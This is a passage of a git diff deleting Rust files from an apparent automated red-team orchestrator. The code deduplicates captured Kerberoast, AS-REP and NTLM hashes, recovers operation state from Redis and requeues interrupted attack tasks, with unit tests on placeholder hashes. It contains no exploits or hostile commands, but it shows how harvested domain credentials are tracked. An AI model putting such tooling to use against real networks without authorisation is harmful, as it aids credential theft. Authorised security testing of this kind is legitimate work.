{ - let spn_key = extract_kerberoast_spn_key(hash_value).unwrap_or_default(); - let key = (domain, username, spn_key); - if seen_kerberoast.contains(&key) { - continue; - } - seen_kerberoast.insert(key); - } else { - if seen_other.contains(hash_value) { - continue; - } - seen_other.insert(hash_value.clone()); - } - - result.push(h); - } - - let removed = original_len - result.len(); - if removed > 0 { - info!(removed = removed, "Deduplicated hashes"); - } - result -} - -/// Extract SPN and encryption type from a Kerberoast hash for deduplication. -/// -/// Hash format: `$krb5tgs$ETYPE$*user$realm$spn*$checksum$encrypted` -pub(crate) fn extract_kerberoast_spn_key(hash_value: &str) -> Option { - if !hash_value.starts_with("$krb5tgs$") { - return None; - } - let dollar_parts: Vec<&str> = hash_value.split('$').collect(); - if dollar_parts.len() < 4 { - return None; - } - let etype = dollar_parts[2]; - let asterisk_parts: Vec<&str> = hash_value.split('*').collect(); - if asterisk_parts.len() < 2 { - return None; - } - let inner_parts: Vec<&str> = asterisk_parts[1].split('$').collect(); - if inner_parts.len() < 3 { - return None; - } - let spn = inner_parts[2]; - Some(format!("{etype}:{spn}")) -} - -#[cfg(test)] -mod tests { - use super::*; - - fn make_hash(username: &str, domain: &str, hash_type: &str, hash_value: &str) -> Hash { - Hash { - id: String::new(), - username: username.to_string(), - hash_value: hash_value.to_string(), - hash_type: hash_type.to_string(), - domain: domain.to_string(), - cracked_password: None, - source: String::new(), - discovered_at: None, - parent_id: None, - attack_step: 0, - aes_key: None, - } - } - - // --- extract_kerberoast_spn_key --- - - #[test] - fn test_extract_spn_key_valid() { - let hash = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$aabb$ccdd"; - let key = extract_kerberoast_spn_key(hash); - assert!(key.is_some()); - let key = key.unwrap(); - assert!(key.starts_with("23:")); - assert!(key.contains("MSSQLSvc")); - } - - #[test] - fn test_extract_spn_key_not_krb5tgs() { - assert_eq!(extract_kerberoast_spn_key("$krb5asrep$23$user"), None); - } - - #[test] - fn test_extract_spn_key_too_short() { - assert_eq!(extract_kerberoast_spn_key("$krb5tgs$"), None); - } - - // --- dedupe_hashes --- - - #[test] - fn test_dedupe_ntlm_by_hash_value() { - let hashes = vec![ - make_hash( - "admin", - "contoso.local", - "ntlm", - "aabbccdd11223344aabbccdd11223344", - ), - make_hash( - "admin", - "contoso.local", - "ntlm", - "aabbccdd11223344aabbccdd11223344", - ), // dup - make_hash( - "admin", - "contoso.local", - "ntlm", - "eeff0011eeff0011eeff0011eeff0011", - ), - ]; - let deduped = dedupe_hashes(hashes); - assert_eq!(deduped.len(), 2); - } - - #[test] - fn test_dedupe_asrep_by_domain_user() { - let hashes = vec![ - make_hash( - "svc_web", - "contoso.local", - "as-rep", - "$krb5asrep$23$svc_web@CONTOSO.LOCAL:aabb", - ), - make_hash( - "svc_web", - "contoso.local", - "asrep", - "$krb5asrep$23$svc_web@CONTOSO.LOCAL:ccdd", - ), - ]; - let deduped = dedupe_hashes(hashes); - assert_eq!(deduped.len(), 1); // same user+domain → deduped - } - - #[test] - fn test_dedupe_asrep_different_users() { - let hashes = vec![ - make_hash( - "svc_web", - "contoso.local", - "as-rep", - "$krb5asrep$23$svc_web:aabb", - ), - make_hash( - "svc_sql", - "contoso.local", - "as-rep", - "$krb5asrep$23$svc_sql:ccdd", - ), - ]; - let deduped = dedupe_hashes(hashes); - assert_eq!(deduped.len(), 2); // different users → kept - } - - #[test] - fn test_dedupe_kerberoast_by_spn() { - let hashes = vec![ - make_hash( - "svc_sql", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$aabb$cc", - ), - make_hash( - "svc_sql", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$ddee$ff", - ), - ]; - let deduped = dedupe_hashes(hashes); - assert_eq!(deduped.len(), 1); // same SPN → deduped - } - - #[test] - fn test_dedupe_mixed_types() { - let hashes = vec![ - make_hash( - "admin", - "contoso.local", - "ntlm", - "aabbccdd11223344aabbccdd11223344", - ), - make_hash( - "svc_web", - "contoso.local", - "as-rep", - "$krb5asrep$23$svc_web:aabb", - ), - make_hash( - "svc_sql", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc*$aa$bb", - ), - ]; - let deduped = dedupe_hashes(hashes); - assert_eq!(deduped.len(), 3); // all unique - } - - #[test] - fn test_dedupe_empty() { - let deduped = dedupe_hashes(vec![]); - assert!(deduped.is_empty()); - } - - #[test] - fn test_dedupe_case_insensitive() { - let hashes = vec![ - make_hash( - "Admin", - "CONTOSO.LOCAL", - "as-rep", - "$krb5asrep$23$Admin:aabb", - ), - make_hash( - "admin", - "contoso.local", - "as-rep", - "$krb5asrep$23$admin:ccdd", - ), - ]; - let deduped = dedupe_hashes(hashes); - assert_eq!(deduped.len(), 1); - } -} diff --git a/ares-orchestrator/src/recovery/manager.rs b/ares-orchestrator/src/recovery/manager.rs deleted file mode 100644 index 140a0bdb..00000000 --- a/ares-orchestrator/src/recovery/manager.rs +++ /dev/null @@ -1,256 +0,0 @@ -//! OperationRecoveryManager -- recovery of operation state from Redis. - -use std::collections::HashMap; - -use anyhow::{Context, Result}; -use redis::AsyncCommands; -use tracing::{error, info, warn}; - -use ares_core::models::{TaskInfo, TaskStatus}; -use ares_core::state::{self, RedisStateReader}; - -use crate::task_queue::TaskQueue; - -use super::dedup::dedupe_hashes; -use super::normalize::{normalize_credential_domains, normalize_hash_domains}; -use super::requeue::requeue_task; -use super::types::{ - is_connection_error, RecoveredState, INTERRUPTED_STATUSES, MAX_CONNECTION_RETRIES, MAX_RETRIES, -}; - -/// Manages recovery of operation state from Redis after a restart. -pub struct OperationRecoveryManager { - redis_url: String, -} - -impl OperationRecoveryManager { - /// Create a new recovery manager. - pub fn new(redis_url: String) -> Self { - Self { redis_url } - } - - /// Attempt to recover an operation's state from Redis. - /// - /// 1. Checks that `ares:op:{operation_id}:meta` exists - /// 2. Loads full state via `RedisStateReader` - /// 3. Deduplicates hashes - /// 4. Normalizes credential/hash domains against netbios_to_fqdn map - /// 5. Loads pending tasks from `ares:op:{id}:pending_tasks` HASH - /// 6. Re-enqueues interrupted tasks (incrementing retry count) - /// 7. Returns recovered state + lists of requeued/failed task IDs - /// - /// Retries up to `MAX_CONNECTION_RETRIES` times on transient Redis errors. - pub async fn recover(&self, operation_id: &str) -> Result { - let mut last_err: Option = None; - - for attempt in 1..=MAX_CONNECTION_RETRIES { - let queue = match TaskQueue::connect(&self.redis_url).await { - Ok(q) => q, - Err(e) => { - if attempt < MAX_CONNECTION_RETRIES { - warn!( - attempt = attempt, - err = %e, - "Redis connection failed, retrying" - ); - last_err = Some(e); - continue; - } - return Err(e).context("Failed to connect to Redis for recovery"); - } - }; - - match Self::recover_inner(&queue, operation_id).await { - Ok(result) => return Ok(result), - Err(e) => { - if is_connection_error(&e) && attempt < MAX_CONNECTION_RETRIES { - warn!( - attempt = attempt, - err = %e, - "Transient Redis error during recovery, retrying" - ); - last_err = Some(e); - continue; - } - return Err(e); - } - } - } - - Err(last_err - .unwrap_or_else(|| anyhow::anyhow!("Recovery retry exhausted")) - .context("Recovery failed after retries")) - } - - /// Inner recovery logic (called within retry wrapper). - async fn recover_inner(queue: &TaskQueue, operation_id: &str) -> Result { - let mut conn = queue.connection(); - let reader = RedisStateReader::new(operation_id.to_string()); - - let exists = reader - .exists(&mut conn) - .await - .context("Failed to check operation existence")?; - if !exists { - anyhow::bail!( - "Operation {} not found in Redis -- cannot recover", - operation_id - ); - } - - let mut loaded_state = reader - .load_state(&mut conn) - .await - .context("Failed to load state from Redis")? - .ok_or_else(|| anyhow::anyhow!("Operation {} has no state data", operation_id))?; - - info!( - operation_id = operation_id, - credentials = loaded_state.all_credentials.len(), - hashes = loaded_state.all_hashes.len(), - hosts = loaded_state.all_hosts.len(), - has_domain_admin = loaded_state.has_domain_admin, - "State loaded for recovery" - ); - - let original_hash_count = loaded_state.all_hashes.len(); - loaded_state.all_hashes = dedupe_hashes(loaded_state.all_hashes); - let deduped = original_hash_count - loaded_state.all_hashes.len(); - if deduped > 0 { - info!(removed = deduped, "Deduplicated hashes during recovery"); - } - - let cred_fixed = normalize_credential_domains( - &mut loaded_state.all_credentials, - &loaded_state.netbios_to_fqdn, - ); - let hash_fixed = - normalize_hash_domains(&mut loaded_state.all_hashes, &loaded_state.netbios_to_fqdn); - - if cred_fixed > 0 || hash_fixed > 0 { - info!( - cred_fixed = cred_fixed, - hash_fixed = hash_fixed, - "Normalized domains during recovery" - ); - - if cred_fixed > 0 { - for cred in &loaded_state.all_credentials { - let _ = reader.add_credential(&mut conn, cred).await; - } - } - if hash_fixed > 0 { - for h in &loaded_state.all_hashes { - let _ = reader.add_hash(&mut conn, h).await; - } - } - } - - let pending_tasks_key = state::build_key(operation_id, state::KEY_PENDING_TASKS); - let raw_tasks: HashMap = - conn.hgetall(&pending_tasks_key).await.unwrap_or_default(); - - let mut pending_tasks: HashMap = HashMap::new(); - for (task_id, json_str) in &raw_tasks { - match serde_json::from_str::(json_str) { - Ok(task_info) => { - pending_tasks.insert(task_id.clone(), task_info); - } - Err(e) => { - warn!( - task_id = %task_id, - err = %e, - "Failed to deserialize pending task, skipping" - ); - } - } - } - - info!( - operation_id = operation_id, - pending_tasks = pending_tasks.len(), - "Loaded pending tasks for recovery" - ); - - let mut requeued_task_ids = Vec::new(); - let mut failed_task_ids = Vec::new(); - - for (task_id, task) in &mut pending_tasks { - if !INTERRUPTED_STATUSES.contains(&task.status) { - continue; - } - - // Increment retry count for tasks that were actively running - if task.status == TaskStatus::InProgress { - task.retry_count += 1; - } - - let max_retries = task.max_retries.max(MAX_RETRIES); - - if task.retry_count <= max_retries { - task.status = TaskStatus::Retrying; - if task.retry_count > 0 { - task.error = Some(format!( - "Pod restart during execution (retry {}/{})", - task.retry_count, max_retries - )); - } else { - task.error = Some("Requeued after pod restart (task was pending)".to_string()); - } - - match requeue_task(queue, task_id, task).await { - Ok(()) => { - requeued_task_ids.push(task_id.clone()); - info!( - task_id = %task_id, - retry_count = task.retry_count, - max_retries = max_retries, - "Task requeued for recovery" - ); - } - Err(e) => { - warn!( - task_id = %task_id, - err = %e, - "Failed to requeue task" - ); - } - } - } else { - // Exceeded max retries - task.status = TaskStatus::Failed; - task.error = Some(format!( - "Pod restart during execution (max retries {} exceeded)", - max_retries - )); - task.completed_at = Some(chrono::Utc::now()); - failed_task_ids.push(task_id.clone()); - error!( - task_id = %task_id, - retry_count = task.retry_count, - "Task permanently failed after max retries" - ); - } - } - - // Persist updated pending_tasks back to Redis - for (task_id, task) in &pending_tasks { - if let Ok(json) = serde_json::to_string(task) { - let _: Result<(), _> = conn.hset(&pending_tasks_key, task_id, &json).await; - } - } - - info!( - operation_id = operation_id, - requeued = requeued_task_ids.len(), - failed = failed_task_ids.len(), - "Recovery complete" - ); - - Ok(RecoveredState { - state: loaded_state, - requeued_task_ids, - failed_task_ids, - }) - } -} diff --git a/ares-orchestrator/src/recovery/mod.rs b/ares-orchestrator/src/recovery/mod.rs deleted file mode 100644 index f9ea6fd5..00000000 --- a/ares-orchestrator/src/recovery/mod.rs +++ /dev/null @@ -1,440 +0,0 @@ -//! Operation recovery manager. -//! -//! On startup, the orchestrator can recover state from a previous run by -//! loading it from Redis and re-enqueueing any interrupted tasks (those with -//! status PENDING, IN_PROGRESS, or RETRYING). -//! -//! Ported from `ares.core.recovery` (Python). Key additions over the initial -//! skeleton: -//! -//! - **Hash deduplication** (`dedupe_hashes`) -- AS-REP by (domain,username), -//! Kerberoast by (domain,username,spn_key), NTLM by exact hash value. -//! - **Pending-task requeuing** -- loads `ares:op:{id}:pending_tasks` HASH -//! instead of scanning global `ares:task_status:*` keys. -//! - **State normalization** -- fixes NetBIOS -> FQDN domain mismatches on -//! credentials and hashes, persists corrections back to Redis. -//! - **Connection error detection** with retry logic. -//! - **`OperationResumeHelper`** -- analysis methods for post-recovery summary. - -mod dedup; -mod manager; -mod normalize; -mod requeue; -mod resume_helper; -mod types; - -// Re-export all public items at the same paths they had before the split. -// Allow unused -- these re-exports document the module API and are needed by -// tests and by main.rs (OperationRecoveryManager). The remaining types are -// returned from public methods and would be needed by any future library consumer. -pub use manager::OperationRecoveryManager; -#[allow(unused_imports)] -pub use resume_helper::OperationResumeHelper; -#[allow(unused_imports)] -pub use types::{InterruptedTask, RecoveredState, RetryingTask}; - -// Items that were module-private in the original single file; re-exported -// here only for intra-crate use and tests. -#[allow(unused_imports)] -pub(crate) use dedup::dedupe_hashes; -#[allow(unused_imports)] -pub(crate) use normalize::{normalize_credential_domains, normalize_hash_domains, resolve_domain}; - -// --------------------------------------------------------------------------- -// Tests -// --------------------------------------------------------------------------- - -#[cfg(test)] -mod tests { - use std::collections::HashMap; - - use ares_core::models::{Credential, Hash, TaskInfo, TaskStatus}; - - use super::dedup::extract_kerberoast_spn_key; - use super::types::is_connection_error; - use super::*; - - fn make_hash(username: &str, domain: &str, hash_type: &str, hash_value: &str) -> Hash { - Hash { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - hash_value: hash_value.to_string(), - hash_type: hash_type.to_string(), - domain: domain.to_string(), - cracked_password: None, - source: String::new(), - discovered_at: None, - parent_id: None, - attack_step: 0, - aes_key: None, - } - } - - // --- Hash dedup tests --- - - #[test] - fn test_dedupe_asrep_by_domain_username() { - let hashes = vec![ - make_hash( - "edavis", - "contoso.local", - "asrep", - "$krb5asrep$23$edavis@CONTOSO.LOCAL$aaaa", - ), - make_hash( - "edavis", - "contoso.local", - "asrep", - "$krb5asrep$23$edavis@CONTOSO.LOCAL$bbbb", - ), - make_hash( - "edavis", - "contoso.local", - "asrep", - "$krb5asrep$23$edavis@CONTOSO.LOCAL$cccc", - ), - ]; - let result = dedupe_hashes(hashes); - assert_eq!( - result.len(), - 1, - "AS-REP hashes for same user should dedupe to 1" - ); - assert!( - result[0].hash_value.ends_with("$aaaa"), - "Should keep first occurrence" - ); - } - - #[test] - fn test_dedupe_asrep_different_users_kept() { - let hashes = vec![ - make_hash( - "edavis", - "contoso.local", - "as-rep", - "$krb5asrep$23$edavis@C$aaa", - ), - make_hash( - "fwilson", - "contoso.local", - "as-rep", - "$krb5asrep$23$fwilson@C$bbb", - ), - ]; - let result = dedupe_hashes(hashes); - assert_eq!(result.len(), 2, "Different users should be kept"); - } - - #[test] - fn test_dedupe_kerberoast_by_spn() { - let hashes = vec![ - make_hash( - "svc_sql", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$checksum1$enc1", - ), - make_hash( - "svc_sql", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$checksum2$enc2", - ), - ]; - let result = dedupe_hashes(hashes); - assert_eq!(result.len(), 1, "Same SPN kerberoast hashes should dedupe"); - } - - #[test] - fn test_dedupe_kerberoast_different_spn_kept() { - let hashes = vec![ - make_hash( - "svc_sql", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01*$chk$enc", - ), - make_hash( - "svc_sql", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db02*$chk$enc", - ), - ]; - let result = dedupe_hashes(hashes); - assert_eq!(result.len(), 2, "Different SPNs should be kept"); - } - - #[test] - fn test_dedupe_ntlm_by_exact_value() { - let hashes = vec![ - make_hash( - "admin", - "contoso.local", - "NTLM", - "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", // pragma: allowlist secret - ), - make_hash( - "admin", - "contoso.local", - "NTLM", - "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", // pragma: allowlist secret - ), - make_hash( - "admin", - "contoso.local", - "NTLM", - "aad3b435b51404eeaad3b435b51404ee:different_hash_value", // pragma: allowlist secret - ), - ]; - let result = dedupe_hashes(hashes); - assert_eq!( - result.len(), - 2, - "Identical NTLM hashes should dedupe, different kept" - ); - } - - #[test] - fn test_dedupe_mixed_types() { - let hashes = vec![ - // 2 AS-REP for same user -> 1 - make_hash( - "edavis", - "contoso.local", - "asrep", - "$krb5asrep$23$edavis@C$a", - ), - make_hash( - "edavis", - "contoso.local", - "asrep", - "$krb5asrep$23$edavis@C$b", - ), - // 1 NTLM - make_hash("admin", "contoso.local", "NTLM", "aad3b435:hash1"), // pragma: allowlist secret - // 1 Kerberoast - make_hash( - "svc", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc$CONTOSO.LOCAL$SPN*$chk$enc", - ), - ]; - let result = dedupe_hashes(hashes); - assert_eq!( - result.len(), - 3, - "Should keep 1 asrep + 1 ntlm + 1 kerberoast" - ); - } - - #[test] - fn test_dedupe_empty() { - let result = dedupe_hashes(vec![]); - assert!(result.is_empty()); - } - - #[test] - fn test_dedupe_case_insensitive() { - let hashes = vec![ - make_hash( - "EDavis", - "CONTOSO.LOCAL", - "asrep", - "$krb5asrep$23$EDavis@C$a", - ), - make_hash( - "edavis", - "contoso.local", - "asrep", - "$krb5asrep$23$edavis@C$b", - ), - ]; - let result = dedupe_hashes(hashes); - assert_eq!(result.len(), 1, "Case-insensitive dedup for AS-REP"); - } - - // --- Retry limit tests --- - - #[test] - fn test_retry_limit_not_exceeded() { - let task = TaskInfo { - task_id: "test_1".to_string(), - task_type: "recon".to_string(), - assigned_agent: "recon".to_string(), - status: TaskStatus::InProgress, - created_at: chrono::Utc::now(), - started_at: None, - completed_at: None, - last_activity_at: chrono::Utc::now(), - params: HashMap::new(), - result: None, - error: None, - retry_count: 2, - max_retries: 3, - }; - // retry_count (2) after increment (3) should still be <= max_retries (3) - assert!( - task.retry_count < task.max_retries, - "Task with retry_count=2 should still be requeueable" - ); - } - - #[test] - fn test_retry_limit_exceeded() { - let task = TaskInfo { - task_id: "test_2".to_string(), - task_type: "recon".to_string(), - assigned_agent: "recon".to_string(), - status: TaskStatus::InProgress, - created_at: chrono::Utc::now(), - started_at: None, - completed_at: None, - last_activity_at: chrono::Utc::now(), - params: HashMap::new(), - result: None, - error: None, - retry_count: 3, - max_retries: 3, - }; - // After increment: retry_count=4 > max_retries=3 - assert!( - task.retry_count + 1 > task.max_retries, - "Task with retry_count=3 after increment should exceed max" - ); - } - - // --- State normalization tests --- - - #[test] - fn test_normalize_credential_domains_netbios_to_fqdn() { - let mut creds = vec![ - Credential { - id: "1".to_string(), - username: "admin".to_string(), - password: "pass".to_string(), // pragma: allowlist secret - domain: "CONTOSO".to_string(), - source: String::new(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }, - Credential { - id: "2".to_string(), - username: "user1".to_string(), - password: "pass2".to_string(), // pragma: allowlist secret - domain: "contoso.local".to_string(), // already FQDN - source: String::new(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }, - ]; - - let mut netbios_map = HashMap::new(); - netbios_map.insert("CONTOSO".to_string(), "contoso.local".to_string()); - - let fixed = normalize_credential_domains(&mut creds, &netbios_map); - assert_eq!(fixed, 1); - assert_eq!(creds[0].domain, "contoso.local"); - assert_eq!(creds[1].domain, "contoso.local"); // unchanged - } - - #[test] - fn test_normalize_hash_domains() { - let mut hashes = vec![make_hash("admin", "FABRIKAM", "NTLM", "hash123")]; - - let mut netbios_map = HashMap::new(); - netbios_map.insert("FABRIKAM".to_string(), "fabrikam.local".to_string()); - - let fixed = normalize_hash_domains(&mut hashes, &netbios_map); - assert_eq!(fixed, 1); - assert_eq!(hashes[0].domain, "fabrikam.local"); - } - - #[test] - fn test_normalize_no_changes_when_fqdn() { - let mut creds = vec![Credential { - id: "1".to_string(), - username: "admin".to_string(), - password: "pass".to_string(), // pragma: allowlist secret - domain: "contoso.local".to_string(), - source: String::new(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }]; - - let netbios_map = HashMap::new(); - let fixed = normalize_credential_domains(&mut creds, &netbios_map); - assert_eq!(fixed, 0, "FQDN domain should not be touched"); - } - - #[test] - fn test_resolve_domain_empty_and_dotted() { - let map = HashMap::new(); - assert!(resolve_domain("", &map).is_none(), "Empty domain -> None"); - assert!( - resolve_domain("already.fqdn.local", &map).is_none(), - "Dotted domain -> None" - ); - } - - #[test] - fn test_resolve_domain_case_insensitive_lookup() { - let mut map = HashMap::new(); - map.insert("CONTOSO".to_string(), "contoso.local".to_string()); - - assert_eq!( - resolve_domain("contoso", &map), - Some("contoso.local".to_string()), - "Lowercase input should match uppercase key via to_uppercase" - ); - assert_eq!( - resolve_domain("CONTOSO", &map), - Some("contoso.local".to_string()), - ); - assert_eq!( - resolve_domain("Contoso", &map), - Some("contoso.local".to_string()), - ); - } - - // --- Kerberoast SPN extraction --- - - #[test] - fn test_extract_kerberoast_spn_key_valid() { - let hash = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$chk$enc"; - let result = extract_kerberoast_spn_key(hash); - assert_eq!(result, Some("23:MSSQLSvc/db01.contoso.local".to_string())); - } - - #[test] - fn test_extract_kerberoast_spn_key_invalid() { - assert!(extract_kerberoast_spn_key("not_a_krb_hash").is_none()); - assert!(extract_kerberoast_spn_key("$krb5tgs$").is_none()); - assert!(extract_kerberoast_spn_key("$krb5tgs$23$nope").is_none()); - } - - // --- Connection error detection --- - - #[test] - fn test_is_connection_error() { - let conn_err = anyhow::anyhow!("Connection reset by peer"); - assert!(is_connection_error(&conn_err)); - - let timeout_err = anyhow::anyhow!("Operation TIMEOUT after 30s"); - assert!(is_connection_error(&timeout_err)); - - let broken = anyhow::anyhow!("Broken pipe"); - assert!(is_connection_error(&broken)); - - let normal = anyhow::anyhow!("Key not found"); - assert!(!is_connection_error(&normal)); - } -} diff --git a/ares-orchestrator/src/recovery/normalize.rs b/ares-orchestrator/src/recovery/normalize.rs deleted file mode 100644 index 5271bfa3..00000000 --- a/ares-orchestrator/src/recovery/normalize.rs +++ /dev/null @@ -1,171 +0,0 @@ -//! State normalization: fix NetBIOS -> FQDN domain mismatches. - -use std::collections::HashMap; - -use ares_core::models::{Credential, Hash}; - -/// If `domain` is a NetBIOS name (no dots, uppercase-ish), look it up in the -/// map and return the FQDN if found. Returns `None` if no fixup is needed. -pub fn resolve_domain(domain: &str, netbios_map: &HashMap) -> Option { - let trimmed = domain.trim(); - if trimmed.is_empty() || trimmed.contains('.') { - // Already FQDN or empty - return None; - } - // Look up the NetBIOS name (case-insensitive) - let upper = trimmed.to_uppercase(); - netbios_map - .get(&upper) - .or_else(|| netbios_map.get(trimmed)) - .or_else(|| netbios_map.get(&trimmed.to_lowercase())) - .cloned() -} - -/// Generic domain normalizer: applies `resolve_domain` to each item's domain, -/// mutating in place via the provided accessor. Returns the count of items fixed. -fn normalize_domains( - items: &mut [T], - netbios_map: &HashMap, - get_domain: F, -) -> usize -where - F: Fn(&mut T) -> &mut String, -{ - let mut fixed = 0; - for item in items.iter_mut() { - let domain = get_domain(item); - if let Some(fqdn) = resolve_domain(domain, netbios_map) { - *domain = fqdn; - fixed += 1; - } - } - fixed -} - -/// Fix credential domains: replace NetBIOS names with FQDNs where the -/// `netbios_to_fqdn` map provides a mapping. -/// -/// Returns the number of credentials fixed. -pub fn normalize_credential_domains( - credentials: &mut [Credential], - netbios_map: &HashMap, -) -> usize { - normalize_domains(credentials, netbios_map, |c| &mut c.domain) -} - -/// Fix hash domains: replace NetBIOS names with FQDNs where the -/// `netbios_to_fqdn` map provides a mapping. -/// -/// Returns the number of hashes fixed. -pub fn normalize_hash_domains(hashes: &mut [Hash], netbios_map: &HashMap) -> usize { - normalize_domains(hashes, netbios_map, |h| &mut h.domain) -} - -#[cfg(test)] -mod tests { - use super::*; - - fn make_map() -> HashMap { - let mut m = HashMap::new(); - m.insert("CONTOSO".to_string(), "contoso.local".to_string()); - m.insert("FABRIKAM".to_string(), "fabrikam.local".to_string()); - m - } - - #[test] - fn test_resolve_domain_netbios_to_fqdn() { - let map = make_map(); - assert_eq!( - resolve_domain("CONTOSO", &map), - Some("contoso.local".to_string()) - ); - } - - #[test] - fn test_resolve_domain_case_insensitive() { - let map = make_map(); - assert_eq!( - resolve_domain("contoso", &map), - Some("contoso.local".to_string()) - ); - } - - #[test] - fn test_resolve_domain_already_fqdn() { - let map = make_map(); - assert_eq!(resolve_domain("contoso.local", &map), None); - } - - #[test] - fn test_resolve_domain_empty() { - let map = make_map(); - assert_eq!(resolve_domain("", &map), None); - } - - #[test] - fn test_resolve_domain_unknown_netbios() { - let map = make_map(); - assert_eq!(resolve_domain("UNKNOWN", &map), None); - } - - #[test] - fn test_normalize_credential_domains() { - let map = make_map(); - let mut creds = vec![ - Credential { - id: String::new(), - username: "admin".to_string(), - password: "P@ss1".to_string(), - domain: "CONTOSO".to_string(), - source: String::new(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }, - Credential { - id: String::new(), - username: "jdoe".to_string(), - password: "P@ss2".to_string(), - domain: "contoso.local".to_string(), - source: String::new(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }, - ]; - let fixed = normalize_credential_domains(&mut creds, &map); - assert_eq!(fixed, 1); - assert_eq!(creds[0].domain, "contoso.local"); - assert_eq!(creds[1].domain, "contoso.local"); // unchanged - } - - #[test] - fn test_normalize_hash_domains() { - let map = make_map(); - let mut hashes = vec![Hash { - id: String::new(), - username: "admin".to_string(), - hash_value: "aabbccdd".to_string(), - hash_type: "ntlm".to_string(), - domain: "FABRIKAM".to_string(), - cracked_password: None, - source: String::new(), - discovered_at: None, - parent_id: None, - attack_step: 0, - aes_key: None, - }]; - let fixed = normalize_hash_domains(&mut hashes, &map); - assert_eq!(fixed, 1); - assert_eq!(hashes[0].domain, "fabrikam.local"); - } - - #[test] - fn test_normalize_empty_slice() { - let map = make_map(); - let mut creds: Vec = vec![]; - assert_eq!(normalize_credential_domains(&mut creds, &map), 0); - } -} diff --git a/ares-orchestrator/src/recovery/requeue.rs b/ares-orchestrator/src/recovery/requeue.rs deleted file mode 100644 index c4b0ab75..00000000 --- a/ares-orchestrator/src/recovery/requeue.rs +++ /dev/null @@ -1,57 +0,0 @@ -//! Task requeuing (preserves original task_id). - -use anyhow::{Context, Result}; -use redis::AsyncCommands; -use tracing::info; - -use ares_core::models::TaskInfo; - -use crate::task_queue::{TaskMessage, TaskQueue, RESULT_QUEUE_PREFIX, TASK_QUEUE_PREFIX}; - -/// Requeue a task to its target role queue, preserving the original task_id. -/// -/// Uses RPUSH so retried tasks are consumed before new ones (workers BRPOP -/// from the right). -pub async fn requeue_task(queue: &TaskQueue, task_id: &str, task: &TaskInfo) -> Result<()> { - let mut payload = task - .params - .iter() - .map(|(k, v)| (k.clone(), v.clone())) - .collect::>(); - - // Add retry metadata - payload.insert( - "_retry_count".to_string(), - serde_json::Value::from(task.retry_count), - ); - payload.insert("_is_retry".to_string(), serde_json::Value::Bool(true)); - - let callback_queue = format!("{RESULT_QUEUE_PREFIX}:{task_id}"); - let msg = TaskMessage { - task_id: task_id.to_string(), - task_type: task.task_type.clone(), - source_agent: "orchestrator".to_string(), - target_agent: task.assigned_agent.clone(), - payload: serde_json::Value::Object(payload), - priority: 1, // High priority for retries - created_at: Some(chrono::Utc::now()), - callback_queue: Some(callback_queue), - }; - - let queue_key = format!("{TASK_QUEUE_PREFIX}:{}", task.assigned_agent); - let json = serde_json::to_string(&msg).context("Failed to serialize requeue TaskMessage")?; - - let mut conn = queue.connection(); - conn.rpush::<_, _, ()>(&queue_key, &json) - .await - .with_context(|| format!("RPUSH to {} for requeue", queue_key))?; - - info!( - task_id = %task_id, - queue = %queue_key, - retry_count = task.retry_count, - "Requeued task (RPUSH)" - ); - - Ok(()) -} diff --git a/ares-orchestrator/src/recovery/resume_helper.rs b/ares-orchestrator/src/recovery/resume_helper.rs deleted file mode 100644 index 1f5a73f4..00000000 --- a/ares-orchestrator/src/recovery/resume_helper.rs +++ /dev/null @@ -1,165 +0,0 @@ -//! Post-recovery analysis helper. - -use std::collections::HashMap; -use std::fmt::Write as _; - -use ares_core::models::{Hash, SharedRedTeamState, TaskInfo, VulnerabilityInfo}; - -use super::types::{InterruptedTask, RetryingTask}; - -/// Post-recovery analysis helper. -/// -/// Provides convenience methods to inspect the recovered state and produce -/// a human-readable summary for the orchestrator. -#[allow(dead_code)] -pub struct OperationResumeHelper<'a> { - pub state: &'a SharedRedTeamState, - pub requeued_task_ids: &'a [String], - pub failed_task_ids: &'a [String], - /// Pending tasks loaded during recovery (task_id -> TaskInfo). - pub pending_tasks: &'a HashMap, -} - -#[allow(dead_code)] -impl<'a> OperationResumeHelper<'a> { - /// Get tasks that permanently failed (exceeded max retries during recovery). - pub fn get_interrupted_tasks(&self) -> Vec { - let mut out = Vec::new(); - for task_id in self.failed_task_ids { - if let Some(task) = self.pending_tasks.get(task_id) { - out.push(InterruptedTask { - task_id: task_id.clone(), - task_type: task.task_type.clone(), - assigned_agent: task.assigned_agent.clone(), - retry_count: task.retry_count, - error: task.error.clone().unwrap_or_default(), - }); - } - } - out - } - - /// Get tasks that were auto-requeued and are currently retrying. - pub fn get_retrying_tasks(&self) -> Vec { - let mut out = Vec::new(); - for task_id in self.requeued_task_ids { - if let Some(task) = self.pending_tasks.get(task_id) { - out.push(RetryingTask { - task_id: task_id.clone(), - task_type: task.task_type.clone(), - assigned_agent: task.assigned_agent.clone(), - retry_count: task.retry_count, - max_retries: task.max_retries, - }); - } - } - out - } - - /// Get vulnerabilities that have been discovered but not 